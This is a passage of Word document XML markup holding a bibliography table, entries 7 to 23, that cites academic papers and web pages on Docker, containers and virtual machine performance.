                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[7] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4FF31FF4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">G. Radchenko, A. Alaasam and A. Tchernykh, “Comparative Analysis of Virtualization Methods In Big Data Processing,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Supercomputing Frontiers and Innovations, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 6, no. 1, pp. 48-79, 2019. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F3E7970" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="36B797CE" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[8] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3C478823" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">D. Samani, C. Denninnart, J. Bacik and et.al, “The Art of CPU-Pinning: Evaluating and Improving the Performance of Virtualization and Containerization Platforms,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">arXiv preprint arXiv:2006.02055, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 4, no. 2, pp. 1-11, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2A8CEB1D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3AC5858B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[9] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="46A106C1" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">O. Bentaleb, A. Belloum, A. Sebaa and e. al, “Containerization technologies: taxonomies, applications and challenges,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">The Journal of Supercomputing, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 1-38, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4673A784" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="7B247892" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[10] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="41326C5B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">M. Moravcik, P. Segec, M. Kontsek and e. el, “Comparison of LXC and Docker Technologies,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ICETA 2020 - 18th IEEE International Conference on Emerging eLearning Technologies and Applications, Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 481-486, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="4F4CD90D" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5DEE3F3B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[11] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="17FC90D4" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Q. Zhang, L. Liu, C. Pu and e. al, “A Comparative Study of Containers and Virtual Machines in Big Data Environment,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">IEEE International Conference on Cloud Computing, CLOUD, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Vols. 2018-July, pp. 178-185, 2018. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="600AD2DF" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="522F9EDD" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[12] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="07EE67A5" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. Joy, “Performance comparison between Linux containers and virtual machines,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Conference Proceeding - 2015 International Conference on Advances in Computer Engineering and Applications, ICACEA 2015, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 342-346, 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="1F98DEB0" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1A489C1E" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[13] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="6E99DBF9" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">X. Xie, P. Wang and Q. Wang, “The performance analysis of Docker and rkt based on Kubernetes,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ICNC-FSKD 2017 - 13th International Conference on Natural Computation, Fuzzy Systems and Knowledge Discovery, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 2137-2141, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="58DD630C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="46A3C9E6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[14] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="14854CBB" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">B. Rad, H. J. Bhatti and M. Ahmadi, “An Introduction to Docker and Analysis of its Performance,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ITCSNS International Journal of Computer Science and Network Security, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 17, no. 3, pp. 228-235, 2017. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="2705F38E" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="402D9748" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[15] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="3011696B" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. M. Potdar, S. Kengond and M. Mulla, “Perfromance evaluation of docker container and virtual machine,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Procedia Computer Science, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 171, pp. 1419-1428, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="3B234B9C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2A5D6594" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[16] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="5C0EB42F" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>docker, “Docker Overview,” docker, [Online]. Available: https://docs.docker.com/get-started/overview/. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="166DBF79" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="54188606" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[17] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="4BDA72AA" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Tuomas, “Advantages of docker,” 2015. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="46004CA8" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0B574506" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[18] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="2DFFB645" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">V. Sharma, H. K. Saxena and A. K. Singh, “Docker for Multi-containers web application,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">2nd International Conference on Innovative Mechanisms for Industry Applications, ICIMIA 2020 - Conference Proceedings, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">pp. 589-592, 2020. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="781AA00C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1489AFD6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[19] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="012B6050" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>O. Nachmani, “5 Key Benefits of Docker: CI, Version Control, Portability, Isolation and Security,” DZone, 19 April 2020. [Online]. Available: https://dzone.com/articles/5-key-benefits-docker-ci. [Accessed 19 July 2021].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="35CE4439" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="307AD509" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:lastRenderedPageBreak/>
                      <w:t xml:space="preserve">[20] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="734B9634" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Sitaram and S. Paktar, “Study of Container Technology with Docker,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">International Journal of Advanced Research in Science, Communication and Technology (IJARSCT), </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 5, no. 2, pp. 504-509, 2021. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="7143DFAB" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="451C17F2" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[21] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="61CF8590" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">A. S. Harji, P. Buhr and T. Brecht, “Our troubles with Linux Kernel upgrades and why you should care,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">ACM SIGOPS Operating system Review, </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">vol. 47, no. 2, pp. 66-72, 2013. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="725B675C" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="53E894B6" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[22] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="1C9DF20C" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">S. Singh and N. Singh, “Containers &amp; Docker: Emerging roles &amp; future of Cloud technology,” in </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t>Proceedings of the 2016 2nd International Conference on Applied and Theoretical Computing and Communication Technology, iCATccT 2016</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">, Bangalore, 2016. </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00A13BEC" w14:paraId="533405F5" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="1437796017"/>
                  <w:tblCellSpacing w:w="15" w:type="dxa"/>
                </w:trPr>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="50" w:type="pct"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="37992CAF" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">[23] </w:t>
                    </w:r>
                  </w:p>
                </w:tc>
                <w:tc>
                  <w:tcPr>
                    <w:tcW w:w="0" w:type="auto"/>
                    <w:hideMark/>
                  </w:tcPr>
                  <w:p w14:paraId="0A53FD95" w14:textId="77777777" w:rsidR="00A13BEC" w:rsidRDefault="00A13BEC">
                    <w:pPr>
                      <w:pStyle w:val="Bibliography"/>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">F. Špaček, R. Sohlich and D. T, “Docker as Platform for Assignments Evaluation,” </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:i/>
                        <w:iCs/>
                        <w:noProof/>
                      </w:rPr>
                      <w:t xml:space="preserve">Procedia Engineering, </w:t>
                    </w:r>
                    <w:r>
